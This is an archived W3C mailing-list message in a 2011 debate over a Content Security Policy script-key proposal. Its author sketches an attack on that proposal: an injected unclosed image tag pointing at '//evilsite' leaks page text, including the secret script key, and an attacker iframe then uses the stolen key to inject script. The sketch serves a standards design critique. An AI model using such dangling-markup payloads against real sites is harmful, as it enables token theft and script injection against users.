W3C home > Mailing lists > Public > public-web-security@w3.org > January 2011

Re: [Content Security Policy] Proposal to move the debate forward

From: gaz Heyes <gazheyes@gmail.com>
Date: Fri, 28 Jan 2011 11:07:33 +0000
Message-ID: <AANLkTikykQVP1Dw1d1LKo80awFTeH=2x3dFhVs3xiMGn@mail.gmail.com>
To: Gervase Markham <gerv@mozilla.org>
Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28 January 2011 11:04, Gervase Markham <gerv@mozilla.org> wrote:

> On 28/01/11 10:54, gaz Heyes wrote:
>
>> You want a automatic attack? Ok. I'm really clueless as to why you don't
>> get this. I said there are many ways. <img src='//evilsite?token please=
>> Initiated by a <iframe src="//cspsite?injection=<img
>> src='//evilsite?token please=" onload="setTimeout(function(){
>> readKey();doJSInjection(); }, 10000)"></iframe>
>>
>
> Still don't get it, sorry :-( If you inject the <img src= etc. into the CSP
> site using script-key, your onload won't run because it doesn't have the
> script-key in the script text.
>
> You need the key to run any script in the page context. _Any_ script -
> event handlers, in-page, external. Apart from your suggestion of managing to
> get a form submitted with a chunk of page HTML in the form data, then you
> need script to get the key. Catch 22.
>

Hehe I thought you were being awkward, ok the iframe isn't injected it
serves to read the data that is injected. So the img injection sends the
data from the page to the next single quote (including the script key) to
our evil server, the evil server then reads the script key and sends it back
to the iframe, the iframe then injects javascript and a valid key. The
iframe is outside of the target site itself.
Received on Friday, 28 January 2011 11:08:05 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Friday, 28 January 2011 11:08:06 GMT